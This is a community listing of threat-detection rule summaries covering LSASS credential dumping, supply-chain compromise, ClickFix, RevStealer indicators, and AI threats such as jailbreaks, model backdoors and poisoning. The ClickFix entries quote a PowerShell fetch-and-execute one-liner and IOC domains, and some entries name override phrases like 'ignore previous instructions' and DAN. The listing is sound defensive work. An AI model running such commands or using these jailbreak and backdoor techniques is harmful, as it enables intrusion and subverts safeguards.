Detections

Explore public detection logic contributed by the community across SIEM and rule languages.

60,142 detections

Detects attempts to create a memory dump of the Local Security Authority Subsystem Service (LSASS) process using well-known utilities such as procdump, rundll32 with comsvcs.dll, and taskmgr, which are frequently used by adversaries to perform credential dumping.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
12 days ago
003
This rule monitors for unauthorized changes to GitHub Actions workflows that involve release or publishing processes, specifically looking for indicators of supply chain compromise like the introduction of 'id-token: write' or changes to publish scripts. It correlates these modifications with subsequent workflow executions and npm registry publish events attributed to the same actor to identify potential account takeover and malicious package distribution.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
407
Detects instances where the system DNS process (dns.exe) on a domain controller performs recursive DNS resolution towards a set of external IP addresses associated with suspicious infrastructure (AS202412). The rule correlates this activity with recent network connections from common web browsers or system utilities (msedge.exe, svchost.exe) on the same host to identify potential proxying of malicious DNS queries.
avatar
Ankit Mehta@Secvyn
avatar
Hunters
12 days ago
003
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
Detection & Hunting Community
12 days ago
003
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
Hunters
12 days ago
003
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
Defender - KQL
12 days ago
003
Detects the execution of processes named 'nohup' with arguments suggesting renderer masquerading ('--type=renderer') containing suspicious terms like 'SystemUpdate' or 'iSync', originating from Cursor IDE helper processes or the terminal shell. This behavior is indicative of a backdoor or malicious process attempting to hide in plain sight by masquerading as legitimate IDE rendering components.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
15 days ago
1007
Sweeps DeviceFileEvents, DeviceProcessEvents, and DeviceNetworkEvents over a rolling 30-day window for known RevStealer indicators: exact SHA-256 matches against all 13 published file hashes, and exact-host matches (via parsed URL host, not substring) against the confirmed C2 domain meta7.archscreen68.one. An empty, extensible IP list is included for when a malicious IP is published.
avatar
Arnold Chan@slaz
avatar
Midnight Slayer
14 days ago
205
Sweeps DeviceFileEvents, DeviceProcessEvents, and DeviceNetworkEvents over a rolling 30-day window for known RevStealer indicators: exact SHA-256 matches against all 13 published file hashes, and exact-host matches (via parsed URL host, not substring) against the confirmed C2 domain meta7.archscreen68.one. An empty, extensible IP list is included for when a malicious IP is published.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
14 days ago
005
Detects instances where an AI agent tool invocation contains potential credential data (API keys, tokens) followed by a suspicious sign-in or Key Vault access event from an atypical location for that specific identity within a short timeframe. This rule monitors for potential exfiltration or abuse of credentials handled or exposed by AI agents.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects potential AI model backdoor trigger attempts by identifying inference requests from a single caller that result in high-confidence, rare-label predictions across multiple distinct input artifacts. This pattern is indicative of an adversary probing or activating a poisoned model by injecting specific triggers designed to force anomalous outputs.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects unauthorized or unreviewed modifications to AI model weights, retraining jobs, or pushes to the model registry within MLOps pipelines. This activity is monitored to prevent AI model weight poisoning, ensuring that all model-related changes undergo required peer-review or approval processes before deployment.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects adversarial evasion attempts against AI-based classification models by identifying inputs that result in a benign or low-risk prediction with confidence scores just below a configured threshold. The detection specifically looks for artifacts that share a hash prefix with previously confirmed malicious samples, indicating a potential iterative perturbation technique used to bypass model boundaries.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects external email or chat messages containing markers typical of Large Language Models (LLMs) combined with urgent language soliciting sensitive information, such as credentials or financial details. The rule correlates these findings with messages from domains that have been recently observed in the environment, indicating potential automated, personalized social engineering campaigns.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
This rule monitors for suspicious activity related to AI service accounts and API keys. It detects potential account or key compromise by identifying impossible travel sign-ins coupled with AI API usage, simultaneous usage of a single API key from multiple disjoint network locations, and sudden, high-volume activity from previously dormant service account API keys.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects instances where machine learning runtime processes (e.g., Python, torch-model-loader) load serialized model files (e.g., .pkl, .joblib, .pth) and subsequently spawn suspicious child processes like command shells, scripting engines, or download utilities. This behavior is indicative of arbitrary code execution via unsafe deserialization of a malicious model artifact.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects unauthorized modifications or non-pipeline uploads to an ML model registry. The rule flags events where model artifacts lack valid signatures, fail checksum verification, or are uploaded/promoted by non-authorized identities or without required CI/CD provenance, indicating potential ML model backdooring or poisoning.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects potential data exfiltration from ML inference APIs by identifying responses to untrusted clients containing patterns indicative of memorized PII (SSN, Email, Credit Card) or detecting automated, repeated extraction-style queries.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects attempts to bypass LLM safety alignment by utilizing roleplay or hypothetical framing (e.g., DAN mode) alongside evidence of prompt iteration, identified by repeated moderation blocks within the same session.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects LLM input containing known instruction-override patterns (e.g., 'ignore previous instructions', 'DAN' jailbreak) paired with requests for privileged system operations, indicating a malicious attempt to bypass guardrails and gain unauthorized control over the LLM model.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002
Detects LLM input containing known instruction-override patterns (e.g., 'ignore previous instructions', 'DAN' jailbreak) paired with requests for privileged system operations, indicating a malicious attempt to bypass guardrails and gain unauthorized control over the LLM model.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
11 days ago
002